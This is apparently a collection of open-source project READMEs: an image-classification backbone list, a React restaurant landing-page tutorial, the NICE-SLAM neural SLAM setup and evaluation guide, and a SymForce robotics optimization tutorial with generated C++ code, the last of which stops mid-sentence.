| DenseNet | DenseNet121 DenseNet161 DenseNet169 DenseNet201 | Visual Attention Network(VAN) | VAN-Tiny VAN-Small VAN-Base VAN-Large | Wide-ResNet | WRN-50 WRN-101 |
| HorNet | HorNet-Tiny HorNet-Tiny-GF HorNet-Small HorNet-Small-GF HorNet-Base HorNet-Base-GF HorNet-Large HorNet-Large-GF HorNet-Large-GF384 | EfficientFormer | efficientformer-l1 efficientformer-l3 efficientformer-l7 | Swin Transformer v2 | tiny-256 window 8 tiny-256 window 16 small-256 window 8 small-256 window 16 base-256 window 8 base-256 window 16 large-256 window 16 large-384 window 24 |
| MViTv2 | MViTv2-Tiny MViTv2-Small MViTv2-Base MViTv2-Large | MobileVit | MobileViT-XXSmall MobileViT-XSmall MobileViT-Small | DaViT | DaViT-T DaViT-S DaViT-B |
| RepLKNet | RepLKNet-31B-224 RepLKNet-31B-384 RepLKNet-31L-384 RepLKNet-XL | BEiT | BEiT-base | EVA | EVA-G-p14-224 EVA-G-p14-336 EVA-G-p14-560 EVA-G-p16-224 EVA-L-p14-224 EVA-L-p14-196 EVA-L-p14-336 |
| MixMIM | mixmim-base | EfficientNetV2 | EfficientNetV2-b0 EfficientNetV2-b1 EfficientNetV2-b2 EfficientNetV2-b3 EfficientNetV2-s EfficientNetV2-m EfficientNetV2-l EfficientNetV2-xl | DeiT3 | deit3_small_p16 deit3_small_p16_384 deit3_base_p16 deit3_base_p16_384 deit3_medium_p16 deit3_large_p16 deit3_large_p16_384 deit3_huge_p16 |
| EdgeNeXt | edgenext-base edgenext-small edgenext-X-small edgenext-XX-small | RevVisionTransformer | revvit-small revvit-base | | |

Other projects I maintain

- Not enough image data? I made an image augmentation tool
- A one-click tool for converting and editing image annotation files that greatly improves efficiency

Reference

```
@repo{2020mmclassification,
    title={OpenMMLab's Image Classification Toolbox and Benchmark},
    author={MMClassification Contributors},
    howpublished = {\url{https://github.com/open-mmlab/mmclassification}},
    year={2020}
}
```
;Integrate deep learning models for image classification | Backbone learning/comparison/magic modification project;pytorch,image-classification,transformer,cnn,pytorch-classification,deep-learning,resnet,swin-transformer
Fafa-DL/Awesome-Backbones
adrianhajdin/project_modern_ui_ux_restaurant;Restaurant Landing Page

Live Site

🌟 Become a top 1% Next.js 13 developer in only one course
🚀 Land your dream programming job in 6 months

Stay up to date with new projects

New major projects coming soon; subscribe to the mailing list to stay up to date: https://resource.jsmasterypro.com/newsletter

Introduction

This is a code repository for the corresponding video tutorial. In this video, we're going to build a Modern UI/UX Restaurant Landing Page Website.

You might be wondering, what are the prerequisites for building such an amazing website? Don't worry, this course is completely beginner-friendly! We're going to start easy and then move to more complex topics. Every step of the way will be explained.

Alongside building the website, you'll learn:

- React functional components and their reusability
- React file and folder structure
- Fundamental CSS properties to master flex & grid
- Fundamentals of the CSS BEM model
- From soft and pleasant animations to complex gradients
- Perfectly placed media queries for satisfactory responsiveness covering almost all devices

And at the end, you'll learn how to deploy your websites to extremely fast servers and give them a custom domain name.;This is a code repository for the corresponding video tutorial. In this video, we're going to build a Modern UI/UX Restaurant Landing Page Website;react,reactjs,modern,ui,ux
adrianhajdin/project_modern_ui_ux_restaurant
cvg/nice-slam;NICE-SLAM: Neural Implicit Scalable Encoding for SLAM

Zihan Zhu* · Songyou Peng* · Viktor Larsson · Weiwei Xu · Hujun Bao · Zhaopeng Cui · Martin R. Oswald · Marc Pollefeys (* Equal Contribution)

CVPR 2022

Paper | Video | Project Page

NICE-SLAM produces accurate dense geometry and camera tracking on large-scale indoor scenes. (The black / red lines are the ground truth / predicted camera trajectory.)

Table of Contents

- Installation
- Visualization
- Demo
- Run
- iMAP*
- Evaluation
- Acknowledgement
- Citation
- Contact

Installation

First you have to make sure that you have all dependencies in place. The simplest way to do so is to use anaconda. You can create an anaconda environment called nice-slam. For linux, you need to install libopenexr-dev before creating the environment.

```bash
sudo apt-get install libopenexr-dev
conda env create -f environment.yaml
conda activate nice-slam
```

Visualizing NICE-SLAM Results

We provide the results of NICE-SLAM ready for download. You can run our interactive visualizer as follows.

Self-captured Apartment

To visualize our results on the self-captured apartment, as shown in the teaser:

```bash
bash scripts/download_vis_apartment.sh
python visualizer.py configs/Apartment/apartment.yaml --output output/vis/Apartment
```

Note for users from China: If you encounter slow download speeds, check in all the scripts/download_*.sh scripts, where we also provide the 和彩云 links for you to download manually.

ScanNet

```bash
bash scripts/download_vis_scene0000.sh
python visualizer.py configs/ScanNet/scene0000.yaml --output output/vis/scannet/scans/scene0000_00
```

You can find the results of NICE-SLAM on other scenes in ScanNet here.

Replica

```bash
bash scripts/download_vis_room1.sh
python visualizer.py configs/Replica/room1.yaml --output output/vis/Replica/room1
```

[Directory structure of ScanNet (click to expand)]

DATAROOT is ./Datasets by default. If a sequence (sceneXXXX_XX) is stored elsewhere, please change the input_folder path in the config file or on the command line.

```
DATAROOT
└── scannet
    └── scans
        └── scene0000_00
            └── frames
                ├── color
                │   ├── 0.jpg
                │   ├── 1.jpg
                │   └── ...
                ├── depth
                │   ├── 0.png
                │   ├── 1.png
                │   └── ...
                ├── intrinsic
                └── pose
                    ├── 0.txt
                    ├── 1.txt
                    └── ...
```

Once the data is downloaded and set up properly, you can run NICE-SLAM:

```bash
python -W ignore run.py configs/ScanNet/scene0000.yaml
```

Replica

Download the data as below; the data is saved into the ./Datasets/Replica folder. Note that the Replica data is generated by the authors of iMAP, so please cite iMAP if you use the data.

```bash
bash scripts/download_replica.sh
```

and you can run NICE-SLAM:

```bash
python -W ignore run.py configs/Replica/room0.yaml
```

The mesh for evaluation is saved as $OUTPUT_FOLDER/mesh/final_mesh_eval_rec.ply, where the unseen regions are culled using all frames.

TUM RGB-D

Download the data as below; the data is saved into the ./Datasets/TUM-RGBD folder.

```bash
bash scripts/download_tum.sh
```

Now run NICE-SLAM:

```bash
python -W ignore run.py configs/TUM_RGBD/freiburg1_desk.yaml
```

Co-Fusion

First, download the dataset. This script should download and unpack the data automatically into the ./Datasets/CoFusion folder.

```bash
bash scripts/download_cofusion.sh
```

Run NICE-SLAM:

```bash
python -W ignore run.py configs/CoFusion/room4.yaml
```

Use your own RGB-D sequence from Kinect Azure

[Details (click to expand)]

1. Please first follow this [guide](http://www.open3d.org/docs/release/tutorial/sensor/azure_kinect.html#install-the-azure-kinect-sdk) to record a sequence and extract aligned color and depth images. (Remember to use `--align_depth_to_color` for `azure_kinect_recorder.py`.)

   DATAROOT is `./Datasets` by default; if a sequence (`sceneXX`) is stored elsewhere, please change the "input_folder" path in the config file or on the command line.

```
DATAROOT
└── Own
    └── scene0
        ├── color
        │   ├── 00000.jpg
        │   ├── 00001.jpg
        │   ├── 00002.jpg
        │   └── ...
        ├── config.json
        ├── depth
        │   ├── 00000.png
        │   ├── 00001.png
        │   ├── 00002.png
        │   └── ...
        └── intrinsic.json
```

2. Prepare a `.yaml` file based on `configs/Own/sample.yaml`. Change the camera intrinsics in the config file based on `intrinsic.json`. You can also get the intrinsics of the depth camera via other tools such as MATLAB.
3. Specify the bound of the scene. If no ground truth camera pose is given, we construct world coordinates on the first frame. The X-axis is from left to right, the Y-axis is from down to up, and the Z-axis is from front to back.
4. Change the `input_folder` path and/or the `output` path in the config file or on the command line.
5. Run NICE-SLAM.

```bash
python -W ignore run.py configs/Own/sample.yaml
```

**(Optional but highly recommended)** If you don't want to specify the bound of the scene or manually change the config file, you can first run the Redwood tool in [Open3D](http://www.open3d.org/) and then run NICE-SLAM. Here we provide steps for the whole pipeline, beginning from recording Azure Kinect videos. (Ubuntu 18.04 and above is recommended.)

1. Download the Open3D repository.

```bash
bash scripts/download_open3d.sh
```

2. Record and extract frames.

```bash
# specify scene ID
sceneid=0
cd 3rdparty/Open3D-0.13.0/examples/python/reconstruction_system/
# record and save to .mkv file
python sensors/azure_kinect_recorder.py --align_depth_to_color --output scene$sceneid.mkv
# extract frames
python sensors/azure_kinect_mkv_reader.py --input scene$sceneid.mkv --output dataset/scene$sceneid
```

3. Run reconstruction.

```bash
python run_system.py dataset/scene$sceneid/config.json --make --register --refine --integrate
# back to main folder
cd ../../../../../
```

4. Prepare the config file.

```bash
python src/tools/prep_own_data.py --scene_folder 3rdparty/Open3D-0.13.0/examples/python/reconstruction_system/dataset/scene$sceneid --ouput_config configs/Own/scene$sceneid.yaml
```

5. Run NICE-SLAM.

```bash
python -W ignore run.py configs/Own/scene$sceneid.yaml
```

iMAP*

We also provide our re-implementation of iMAP (iMAP*) for use. If you use the code, please cite both the original iMAP paper and NICE-SLAM.

Usage

iMAP* shares the majority of its code with NICE-SLAM. To run iMAP*, simply use the *_imap.yaml config files and also add the argument --imap on the command line. For example, to run iMAP* on Replica room0:

```bash
python -W ignore run.py configs/Replica/room0_imap.yaml --imap
```

To use our interactive visualizer:

```bash
python visualizer.py configs/Replica/room0_imap.yaml --imap
```

To evaluate ATE:

```bash
python src/tools/eval_ate.py configs/Replica/room0_imap.yaml --imap
```

[Differences between iMAP* and the original iMAP (click to expand)]

#### Keyframe pose optimization during mapping

We do not optimize the selected keyframes' poses for iMAP*, because optimizing them usually leads to worse performance. One possible reason is that their keyframes are selected globally, and many of them do not have overlapping regions, especially when the scene gets larger. Overlap is a prerequisite for bundle adjustment (BA). For NICE-SLAM, we only select overlapping keyframes within a small window (local BA), which works well in all scenes. You can still turn on keyframe pose optimization during mapping for iMAP* by enabling `BA` in the config file.

#### Active sampling

We disable active sampling in iMAP*, because in our experiments we observe that it does not improve performance while it brings additional computational overhead.

For image active sampling, in each iteration the original iMAP uniformly samples 200 pixels in the entire image. Next, they divide the image into an 8x8 grid and calculate a probability distribution from the rendering losses. This means that if the resolution of an image is 1200x680 (Replica), only around 3 pixels are sampled to calculate the distribution for each 150x85 grid patch. This is not much different from simple uniform sampling. Therefore, during mapping we use the same pixel sampling strategy as NICE-SLAM for iMAP*: uniform sampling, but with even 4x more pixels than reported in the iMAP paper.

For keyframe active sampling, the original iMAP requires rendering depth and color images for all keyframes to get the loss distribution, which is expensive, and again we did not find it very helpful. Instead, as done in NICE-SLAM, iMAP* randomly samples keyframes from the keyframe list. We also let iMAP* optimize for 4x more iterations than NICE-SLAM, but its performance is still inferior.

#### Keyframe selection

For fair comparison, we use the same keyframe selection method in iMAP* as in NICE-SLAM: add one keyframe to the keyframe list every 50 frames.

Evaluation

Average Trajectory Error

To evaluate the average trajectory error, run the command below with the corresponding config file:

```bash
python src/tools/eval_ate.py configs/Replica/room0.yaml
```

Reconstruction Error

To evaluate the reconstruction error, first download the ground truth Replica meshes where unseen regions have been culled.

```bash
bash scripts/download_cull_replica_mesh.sh
```

Then run the command below (same for NICE-SLAM and iMAP*). The 2D metric requires rendering 1000 depth images, which will take some time (~9 minutes). Use -2d to enable the 2D metric, and -3d to enable the 3D metric.

```bash
# assign any output_folder and gt mesh you like, here is just an example
OUTPUT_FOLDER=output/Replica/room0
GT_MESH=cull_replica_mesh/room0.ply
python src/tools/eval_recon.py --rec_mesh $OUTPUT_FOLDER/mesh/final_mesh_eval_rec.ply --gt_mesh $GT_MESH -2d -3d
```

We also provide code to cull the mesh given camera poses. Here we take culling of the ground truth mesh of Replica room0 as an example.

```bash
python src/tools/cull_mesh.py --input_mesh Datasets/Replica/room0_mesh.ply --traj Datasets/Replica/room0/traj.txt --output_mesh cull_replica_mesh/room0.ply
```

[For iMAP* evaluation (click to expand)]

As discussed in many recent papers, e.g. UNISURF/VolSDF/NeuS, manually thresholding the volume density during marching cubes might be needed. Moreover, we find that there exist scaling differences, possibly because of the reason discussed in [NeuS](https://arxiv.org/abs/2106.10689). Therefore, ICP with scale is needed. You can use the [ICP tool](https://www.cloudcompare.org/doc/wiki/index.php?title=ICP) in [CloudCompare](https://www.danielgm.net/cc/) with default configuration with scaling enabled.
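If you prefer to script the alignment instead of using the CloudCompare GUI, the same ICP-with-scale step can also be done in Open3D, which exposes scale estimation through TransformationEstimationPointToPoint(with_scaling=True). This is a minimal sketch, not part of this repository; the file paths and point counts are placeholders.

```python
import open3d as o3d

# Placeholder paths: a mesh reconstructed by iMAP* and the culled ground truth mesh.
rec = o3d.io.read_triangle_mesh("output/Replica/room0_imap/mesh/final_mesh_eval_rec.ply")
gt = o3d.io.read_triangle_mesh("cull_replica_mesh/room0.ply")

# Sample point clouds from both meshes for registration.
rec_pcd = rec.sample_points_uniformly(number_of_points=200000)
gt_pcd = gt.sample_points_uniformly(number_of_points=200000)

# Point-to-point ICP with scale estimation enabled, mirroring the
# "ICP with scale" step described above.
result = o3d.pipelines.registration.registration_icp(
    rec_pcd,
    gt_pcd,
    max_correspondence_distance=0.1,
    estimation_method=o3d.pipelines.registration.TransformationEstimationPointToPoint(
        with_scaling=True),
)

# Apply the estimated similarity transform before computing reconstruction metrics.
rec.transform(result.transformation)
o3d.io.write_triangle_mesh("room0_imap_aligned.ply", rec)
```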
Acknowledgement

We adapted some code from several awesome repositories, including convolutional_occupancy_networks, nerf-pytorch, lietorch, and DIST-Renderer. Thanks for making the code publicly available. We also thank Edgar Sucar for allowing us to make the Replica dataset available.

Citation

If you find our code or paper useful, please cite:

```bibtex
@inproceedings{Zhu2022CVPR,
  author    = {Zhu, Zihan and Peng, Songyou and Larsson, Viktor and Xu, Weiwei and Bao, Hujun and Cui, Zhaopeng and Oswald, Martin R. and Pollefeys, Marc},
  title     = {NICE-SLAM: Neural Implicit Scalable Encoding for SLAM},
  booktitle = {Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)},
  year      = {2022}
}
```

Contact

Contact Zihan Zhu and Songyou Peng for questions, comments and bug reports.;[CVPR'22] NICE-SLAM: Neural Implicit Scalable Encoding for SLAM;slam,neural-fields,neural-implicit-representations,scalable,implicit-functions,localization,deep-learning,3d-reconstruction
cvg/nice-slam
symforce-org/symforce;SymForce is a fast symbolic computation and code generation library for robotics applications like computer vision, state estimation, motion planning, and controls. It combines the development speed and flexibility of symbolic mathematics with the performance of autogenerated, highly optimized code in C++ or any target runtime language.

SymForce contains three independently useful systems:

- Symbolic Toolkit - builds on the SymPy API to provide rigorous geometric and camera types, Lie group calculus, singularity handling, and tools to model complex problems
- Code Generator - transforms symbolic expressions into blazing-fast, branchless code with clean APIs and minimal dependencies, with a template system to target any language
- Optimization Library - a fast tangent-space optimization library based on factor graphs, with a highly optimized implementation for real-time robotics applications

SymForce automatically computes tangent-space Jacobians, eliminating the need for any bug-prone handwritten derivatives. Generated functions can be directly used as factors in our nonlinear optimizer. This workflow enables faster runtime functions, faster development time, and fewer lines of handwritten code versus alternative methods.

SymForce is developed and maintained by Skydio. It is used in production to accelerate tasks like SLAM, bundle adjustment, calibration, and sparse nonlinear MPC for autonomous robots at scale.

Features

- Symbolic implementations of geometry and camera types with Lie group operations
- Code generation of fast native runtime code from symbolic expressions, reducing duplication and minimizing bugs
- Novel tools to compute fast and correct tangent-space Jacobians for any expression, avoiding all handwritten derivatives
- Strategies for flattening computation and leveraging sparsity that can yield 10x speedups over standard autodiff
- A fast tangent-space optimization library in C++ and Python based on factor graphs
- Rapid prototyping and analysis of complex problems with symbolic math, with a seamless workflow into production use
- Embedded-friendly C++ generation of templated Eigen code with zero dynamic memory allocation
- Highly performant, modular, tested, and extensible code

Read the paper: https://arxiv.org/abs/2204.07889
And watch the video: https://youtu.be/QO_ltJRNj0o

SymForce was published at RSS 2022. Please cite it as follows:

```bibtex
@inproceedings{Martiros-RSS-22,
  author    = {Hayk Martiros AND Aaron Miller AND Nathan Bucki AND Bradley Solliday AND Ryan Kennedy AND Jack Zhu AND Tung Dang AND Dominic Pattison AND Harrison Zheng AND Teo Tomic AND Peter Henry AND Gareth Cross AND Josiah VanderMey AND Alvin Sun AND Samuel Wang AND Kristen Holtz},
  title     = {{SymForce: Symbolic Computation and Code Generation for Robotics}},
  booktitle = {Proceedings of Robotics: Science and Systems},
  year      = {2022},
  doi       = {10.15607/RSS.2022.XVIII.041}
}
```

Install

Install with pip:

```bash
pip install symforce
```

Verify the installation in Python:

```python
import symforce.symbolic as sf
sf.Rot3()
```

This installs pre-compiled C++ components of SymForce on Linux and Mac using pip wheels, but does not include C++ headers. If you want to compile against C++ SymForce types (like sym::Optimizer), you currently need to build from source.

Tutorial

Let's walk through a simple example of modeling and solving an optimization problem with SymForce. In this example a robot moves through a 2D plane and the goal is to estimate its pose at multiple time steps given noisy measurements.
The robot measures:
- the distance it traveled, from an odometry sensor
- relative bearing angles to known landmarks in the scene

The robot's heading angle is defined counter-clockwise from the x-axis, and its relative bearing measurements are defined from the robot's forward direction.

Explore the math

Import the SymForce symbolic API, which contains the augmented SymPy API, as well as geometry and camera types:

```python
import symforce.symbolic as sf
```

Create a symbolic 2D pose and landmark location. Using symbolic variables lets us explore and build up the math in a pure form.

```python
pose = sf.Pose2(
    t=sf.V2.symbolic("t"),
    R=sf.Rot2.symbolic("R")
)
landmark = sf.V2.symbolic("L")
```

Let's transform the landmark into the local frame of the robot. We choose to represent poses as world_T_body, meaning that to take a landmark in the world frame and get its position in the body frame, we do:

```python
landmark_body = pose.inverse() * landmark
```

$$
\begin{bmatrix}
R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0 \\
-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1
\end{bmatrix}
$$

You can see that sf.Rot2 is represented internally by a complex number (𝑅𝑟𝑒, 𝑅𝑖𝑚) and we can study how it rotates the landmark 𝐿.

For exploration purposes, let's take the jacobian of the body-frame landmark with respect to the tangent space of the Pose2, parameterized as (𝜃, 𝑥, 𝑦):

```python
landmark_body.jacobian(pose)
```

$$
\begin{bmatrix}
-L_0 R_{im} + L_1 R_{re} + t_0 R_{im} - t_1 R_{re}, & -R_{re}, & -R_{im} \\
-L_0 R_{re} - L_1 R_{im} + t_0 R_{re} + t_1 R_{im}, & R_{im}, & -R_{re}
\end{bmatrix}
$$

Note that even though the orientation is stored as a complex number, the tangent space is a scalar angle and SymForce understands that.

Now compute the relative bearing angle:

```python
sf.atan2(landmark_body[1], landmark_body[0])
```

$$
atan_2(-R_{im} L_0 + R_{re} L_1 + R_{im} t_0 + R_{re} t_1,\; R_{re} L_0 + R_{im} L_1 - R_{im} t_1 - R_{re} t_0)
$$

One important note is that atan2 is singular at (0, 0). In SymForce we handle this by placing a symbol ϵ (epsilon) that preserves the value of an expression in the limit of ϵ → 0, but allows evaluating at runtime with a very small nonzero value. Functions with singularities accept an epsilon argument:

```python
sf.V3.symbolic("x").norm(epsilon=sf.epsilon())
```

$$
\sqrt{x_0^2 + x_1^2 + x_2^2 + \epsilon}
$$

See the Epsilon Tutorial in the SymForce Docs for more information.

Build an optimization problem

We will model this problem as a factor graph and solve it with nonlinear least-squares.

First, we need to tell SymForce to use a nonzero epsilon to prevent singularities. This isn't necessary when playing around with symbolic expressions like we were above, but it's important now that we want to numerically evaluate some results. For more information, check out the Epsilon Tutorial - for now, all you need to do is this:

```python
import symforce
symforce.set_epsilon_to_symbol()
```

This needs to be done before other parts of symforce are imported - if you're following along in a notebook you should add this at the top and restart the kernel.

Now that epsilon is set up, we will instantiate numerical Values for the problem, including an initial guess for our unknown poses (just set them to identity).
```python
import numpy as np
from symforce.values import Values

num_poses = 3
num_landmarks = 3

initial_values = Values(
    poses=[sf.Pose2.identity()] * num_poses,
    landmarks=[sf.V2(-2, 2), sf.V2(1, -3), sf.V2(5, 2)],
    distances=[1.7, 1.4],
    angles=np.deg2rad([[145, 335, 55], [185, 310, 70], [215, 310, 70]]).tolist(),
    epsilon=sf.numeric_epsilon,
)
```

Next, we can set up the factors connecting our variables. The residual function comprises two terms - one for the bearing measurements and one for the odometry measurements. Let's formalize the math we just defined for the bearing measurements into a symbolic residual function:

```python
def bearing_residual(
    pose: sf.Pose2, landmark: sf.V2, angle: sf.Scalar, epsilon: sf.Scalar
) -> sf.V1:
    t_body = pose.inverse() * landmark
    predicted_angle = sf.atan2(t_body[1], t_body[0], epsilon=epsilon)
    return sf.V1(sf.wrap_angle(predicted_angle - angle))
```

This function takes in a pose and landmark variable and returns the error between the predicted bearing angle and a measured value. Note that we call sf.wrap_angle on the angle difference to prevent wraparound effects.

The residual for distance traveled is even simpler:

```python
def odometry_residual(
    pose_a: sf.Pose2, pose_b: sf.Pose2, dist: sf.Scalar, epsilon: sf.Scalar
) -> sf.V1:
    return sf.V1((pose_b.t - pose_a.t).norm(epsilon=epsilon) - dist)
```

Now we can create Factor objects from the residual functions and a set of keys. The keys are named strings for the function arguments, which will be accessed by name from a Values class we later instantiate with numerical quantities.

```python
from symforce.opt.factor import Factor

factors = []

# Bearing factors
for i in range(num_poses):
    for j in range(num_landmarks):
        factors.append(Factor(
            residual=bearing_residual,
            keys=[f"poses[{i}]", f"landmarks[{j}]", f"angles[{i}][{j}]", "epsilon"],
        ))

# Odometry factors
for i in range(num_poses - 1):
    factors.append(Factor(
        residual=odometry_residual,
        keys=[f"poses[{i}]", f"poses[{i + 1}]", f"distances[{i}]", "epsilon"],
    ))
```

Here is a visualization of the structure of this factor graph:

Solve the problem

Our goal is to find poses of the robot that minimize the residual of this factor graph, assuming the landmark positions in the world are known. We create an Optimizer with these factors and tell it to only optimize the pose keys (the rest are held constant):

```python
from symforce.opt.optimizer import Optimizer

optimizer = Optimizer(
    factors=factors,
    optimized_keys=[f"poses[{i}]" for i in range(num_poses)],
    # So that we save more information about each iteration, to visualize later:
    debug_stats=True,
)
```

Now run the optimization! This returns an Optimizer.Result object that contains the optimized values, error statistics, and per-iteration debug stats (if enabled).

```python
result = optimizer.optimize(initial_values)
```

We can check that the optimization succeeded, and look at the final error:

```python
assert result.status == Optimizer.Status.SUCCESS
print(result.error())
```

Let's visualize what the optimizer did. The orange circles represent the fixed landmarks, the blue circles represent the robot, and the dotted lines represent the bearing measurements.

```python
from symforce.examples.robot_2d_localization.plotting import plot_solution
plot_solution(optimizer, result)
```

All of the code for this example can also be found in symforce/examples/robot_2d_localization.

Symbolic vs Numerical Types

SymForce provides sym packages with runtime code for geometry and camera types that are generated from its symbolic geo and cam packages.
As such, there are multiple versions of a class like Pose3 and it can be a common source of confusion.

The canonical symbolic class sf.Pose3 lives in the symforce package:

```python
sf.Pose3.identity()
```

The autogenerated Python runtime class sym.Pose3 lives in the sym package:

```python
import sym
sym.Pose3.identity()
```

The autogenerated C++ runtime class sym::Pose3 lives in the sym:: namespace:

```c++
sym::Pose3<double>::Identity()
```

The matrix type for symbolic code is sf.Matrix, for generated Python is numpy.ndarray, and for C++ is Eigen::Matrix.

The symbolic classes can also handle numerical values, but will be dramatically slower than the generated classes. The symbolic classes must be used when defining functions for codegen and optimization. Generated functions always accept the runtime types. The Codegen or Factor objects require symbolic types and functions to do math and generate code. However, once code is generated, numerical types should be used when invoking generated functions and in the initial values when calling the Optimizer. As a convenience, the Python Optimizer class can accept symbolic types in its Values and convert to numerical types before invoking generated functions. This is done in the tutorial example for simplicity.

Generate runtime C++ code

Let's look under the hood to understand how that optimization worked. For each factor, SymForce introspects the form of the symbolic function, passes through symbolic inputs to build an output expression, automatically computes tangent-space jacobians of those output expressions w.r.t. the optimized variables, and generates fast runtime code for them.

The Codegen class is the central tool for generating runtime code from symbolic expressions. In this case, we pass it the bearing residual function and configure it to generate C++ code:

```python
from symforce.codegen import Codegen, CppConfig

codegen = Codegen.function(bearing_residual, config=CppConfig())
```

We can then create another Codegen object that computes a Gauss-Newton linearization from this Codegen object. It does this by introspecting and symbolically differentiating the given arguments:

```python
codegen_linearization = codegen.with_linearization(
    which_args=["pose"]
)
```

Generate a C++ function that computes the linearization wrt the pose argument:

```python
metadata = codegen_linearization.generate_function()
print(open(metadata.generated_files[0]).read())
```

This C++ code depends only on Eigen and computes the results in a single flat function that shares all common sub-expressions:

```c++
#pragma once

#include <cmath>

#include <Eigen/Core>

namespace sym {

/**
 * This function was autogenerated from a symbolic function. Do not modify by hand.
 *
 * Symbolic function: bearing_residual
 *
 * Args:
 *     pose: Pose2
 *     landmark: Matrix21
 *     angle: Scalar
 *     epsilon: Scalar
 *
 * Outputs:
 *     res: Matrix11
 *     jacobian: (1x3) jacobian of res wrt arg pose (3)
 *     hessian: (3x3) Gauss-Newton hessian for arg pose (3)
 *     rhs: (3x1) Gauss-Newton rhs for arg pose (3)
 */
template <typename Scalar>
void BearingFactor(const sym::Pose2<Scalar>& pose, const Eigen::Matrix<Scalar, 2, 1>& landmark,
                   const Scalar angle, const Scalar epsilon,
                   Eigen::Matrix<Scalar, 1, 1>* const res = nullptr,
                   Eigen::Matrix<Scalar, 1, 3>* const jacobian = nullptr,
                   Eigen::Matrix<Scalar, 3, 3>* const hessian = nullptr,
                   Eigen::Matrix<Scalar, 3, 1>* const rhs = nullptr) {
  // Total ops: 66

  // Input arrays
  const Eigen::Matrix<Scalar, 4, 1>& _pose = pose.Data();

  // Intermediate terms (24)
  const Scalar _tmp0 = _pose[1] * _pose[2];
  const Scalar _tmp1 = _pose[0] * _pose[3];
  const Scalar _tmp2 = _pose[0] * landmark(1, 0) - _pose[1] * landmark(0, 0);
  const Scalar _tmp3 = _tmp0 - _tmp1 + _tmp2;
  const Scalar _tmp4 = _pose[0] * _pose[2] + _pose[1] * _pose[3];
  const Scalar _tmp5 = _pose[1] * landmark(1, 0);
  const Scalar _tmp6 = _pose[0] * landmark(0, 0);
  const Scalar _tmp7 = -_tmp4 + _tmp5 + _tmp6;
  const Scalar _tmp8 = _tmp7 + epsilon * ((((_tmp7) > 0) - ((_tmp7) < 0)) + Scalar(0.5));
  const Scalar _tmp9 = -angle + std::atan2(_tmp3, _tmp8);
  const Scalar _tmp10 =
      _tmp9 - 2 * Scalar(M_PI) * std::floor((Scalar(1) / Scalar(2)) * (_tmp9 + Scalar(M_PI)) / Scalar(M_PI));
  const Scalar _tmp11 = Scalar(1.0) / (_tmp8);
  const Scalar _tmp12 = std::pow(_tmp8, Scalar(2));
  const Scalar _tmp13 = _tmp3 / _tmp12;
  const Scalar _tmp14 = _tmp11 * (_tmp4 - _tmp5 - _tmp6) - _tmp13 * (_tmp0 - _tmp1 + _tmp2);
  const Scalar _tmp15 = _tmp12 + std::pow(_tmp3, Scalar(2));
  const Scalar _tmp16 = _tmp12 / _tmp15;
  const Scalar _tmp17 = _tmp14 * _tmp16;
  const Scalar _tmp18 = _pose[0] * _tmp13 + _pose[1] * _tmp11;
  const Scalar _tmp19 = _tmp16 * _tmp18;
  const Scalar _tmp20 = -_pose[0] * _tmp11 + _pose[1] * _tmp13;
  const Scalar _tmp21 = _tmp16 * _tmp20;
  const Scalar _tmp22 = std::pow(_tmp8, Scalar(4)) / std::pow(_tmp15, Scalar(2));
  const Scalar _tmp23 = _tmp18 * _tmp22;

  // Output terms (4)
  if (res != nullptr) {
    Eigen::Matrix<Scalar, 1, 1>& _res = (*res);
    _res(0, 0) = _tmp10;
  }

  if (jacobian != nullptr) {
    Eigen::Matrix<Scalar, 1, 3>& _jacobian = (*jacobian);
    _jacobian(0, 0) = _tmp17;
    _jacobian(0, 1) = _tmp19;
    _jacobian(0, 2) = _tmp21;
  }

  if (hessian != nullptr) {
    Eigen::Matrix<Scalar, 3, 3>& _hessian = (*hessian);
    _hessian(0, 0) = std::pow(_tmp14, Scalar(2)) * _tmp22;
    _hessian(0, 1) = 0;
    _hessian(0, 2) = 0;
    _hessian(1, 0) = _tmp14 * _tmp23;
    _hessian(1, 1) = std::pow(_tmp18, Scalar(2)) * _tmp22;
    _hessian(1, 2) = 0;
    _hessian(2, 0) = _tmp14 * _tmp20 * _tmp22;
    _hessian(2, 1) = _tmp20 * _tmp23;
    _hessian(2, 2) = std::pow(_tmp20, Scalar(2)) * _tmp22;
  }

  if (rhs != nullptr) {
    Eigen::Matrix<Scalar, 3, 1>& _rhs = (*rhs);
    _rhs(0, 0) = _tmp10 * _tmp17;
    _rhs(1, 0) = _tmp10 * _tmp19;
    _rhs(2, 0) = _tmp10 * _tmp21;
  }
}

}  // namespace sym
```

SymForce can also generate runtime Python code that depends only on numpy. The code generation system is written with pluggable jinja templates to minimize the work to add new backend languages. Some of our top candidates to add are TypeScript, CUDA, and PyTorch.

Optimize from C++

Now that we can generate C++ functions for each residual function, we can also run the optimization purely from C++ to get Python entirely out of the loop for production use.
```c++ const int num_poses = 3; const int num_landmarks = 3; std::vector > factors; // Bearing factors for (int i = 0; i < num_poses; ++i) { for (int j = 0; j < num_landmarks; ++j) { factors.push_back(sym::Factor ::Hessian( sym::BearingFactor , {{'P', i}, {'L', j}, {'a', i, j}, {'e'}}, // keys {{'P', i}} // keys to optimize )); } } // Odometry factors for (int i = 0; i < num_poses - 1; ++i) { factors.push_back(sym::Factor ::Hessian( sym::OdometryFactor , {{'P', i}, {'P', i + 1}, {'d', i}, {'e'}}, // keys {{'P', i}, {'P', i + 1}} // keys to optimize )); } const auto params = sym::DefaultOptimizerParams(); sym::Optimizer optimizer( params, factors, sym::kDefaultEpsilon ); sym::Values values; for (int i = 0; i < num_poses; ++i) { values.Set({'P', i}, sym::Pose2d::Identity()); } // Set additional values values.Set({'L', 0}, Eigen::Vector2d(-2, 2)); values.Set({'L', 1}, Eigen::Vector2d(1, -3)); values.Set({'L', 2}, Eigen::Vector2d(5, 2)); values.Set({'d', 0}, 1.7); values.Set({'d', 1}, 1.4); const std::array , 3> angles = { {{55, 245, -35}, {95, 220, -20}, {125, 220, -20}} }; for (int i = 0; i < angles.size(); ++i) { for (int j = 0; j < angles[0].size(); ++j) { values.Set({'a', i, j}, angles[i][j] * M_PI / 180); } } values.Set('e', sym::kDefaultEpsilond); // Optimize! const auto stats = optimizer.Optimize(values); std::cout << "Exit status: " << stats.status << std::endl; std::cout << "Optimized values:" << values << std::endl; ``` This tutorial shows the central workflow in SymForce for creating symbolic expressions, generating code, and optimizing. This approach works well for a wide range of complex problems in robotics, computer vision, and applied science. However, each 